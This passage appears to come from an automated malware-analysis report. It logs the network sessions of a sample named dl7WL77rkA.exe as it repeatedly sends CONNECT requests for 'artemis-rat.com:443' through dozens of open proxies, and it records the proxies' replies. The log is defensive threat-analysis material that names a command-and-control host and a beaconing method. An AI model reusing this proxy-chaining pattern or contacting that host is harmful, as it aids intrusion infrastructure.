                                                                                                                                                                                                                                                            746192.168.2.552130174.64.199.7941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507249117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            747192.168.2.552169194.4.50.132123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507250071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            748192.168.2.55213172.195.34.4241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507756948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            749192.168.2.55213372.206.181.97649433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.508167982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            750192.168.2.55213272.210.252.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.508331060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            751192.168.2.55213470.166.167.38577283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.521159887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            752192.168.2.551420160.153.254.240485023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.521178007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.607786894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702475071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.780483007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            753192.168.2.55207231.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.522083998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            754192.168.2.55213672.195.114.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.522998095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
755192.168.2.552089161.97.74.176300003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.523487091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.864326954 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port as an HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, not an HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPort configuration option in place of, or in addition to, SOCKSPort. Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
756192.168.2.551980203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.524126053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
757192.168.2.552063103.153.134.2080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.524131060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.311186075 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.405364990 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.548204899 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.902420998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
758192.168.2.55217834.83.143.631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.525176048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.723443031 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
759192.168.2.551965103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.525192022 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
760192.168.2.551967103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.525532961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
761192.168.2.551519135.148.10.16139703876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.549424887 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
762192.168.2.552033103.76.253.6631293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.550057888 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.020524025 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
763192.168.2.552053221.6.139.19090023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.550431967 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.077491999 CET | 311 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
764192.168.2.55203435.154.71.7210803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.550595045 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.946753979 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:40 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            765192.168.2.55218938.162.23.2431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.550960064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.965552092 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            766192.168.2.552028222.138.76.690023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.551532984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.963229895 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            767192.168.2.55158650.63.12.33147383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.559613943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            768192.168.2.551433103.81.221.10180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.560319901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.648493052 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            769192.168.2.55224672.167.221.157647423876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.563183069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            770192.168.2.55212945.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.566601992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            771192.168.2.55223092.204.135.37586043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.570609093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.092344046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811336040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217612982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            772192.168.2.55214651.89.173.40317243876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.570610046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            773192.168.2.552249162.241.158.204505633876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.579627991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.092345953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811261892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108345985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.608529091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202213049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.723165035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.717564106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            774192.168.2.55213594.131.14.6610813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.579654932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            775192.168.2.55215558.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.580598116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            776192.168.2.55223392.204.134.3877853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.582449913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
